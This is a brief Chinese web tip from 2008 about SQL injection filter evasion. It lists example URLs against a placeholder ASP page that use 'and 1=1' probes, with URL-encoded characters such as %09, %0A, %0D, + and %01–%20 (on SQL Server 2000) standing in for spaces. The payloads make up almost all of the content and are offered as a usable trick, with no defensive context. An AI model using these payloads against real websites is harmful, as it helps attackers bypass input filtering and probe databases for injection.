首页 运维 网络学院 查看内容

SQL注入中可以替换空格的字符

2008-10-14 09:56 1012 0

摘要:   默认是:  http://www.xxx.com/shownotice.asp?id=78 and 1=1  实际上用%09  %0A  %0D  +都可以替代空格 ...
关键词: shownotice http asp com www xxx 上用 nbsp 78 id

  默认是:  http://www.xxx.com/shownotice.asp?id=78 and 1=1  实际上用%09  %0A  %0D  +都可以替代空格  例如:  http://www.xxx.com/shownotice.asp?id=78%09and%091=1  http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1  http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1  http://www.xxx.com/shownotice.asp?id=78%+and+1=1  以下可以在SQLServer2000下可以替换%01到%20都可以  http://www.xxx.com/shownotice.asp?id=78%19and%191=1
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部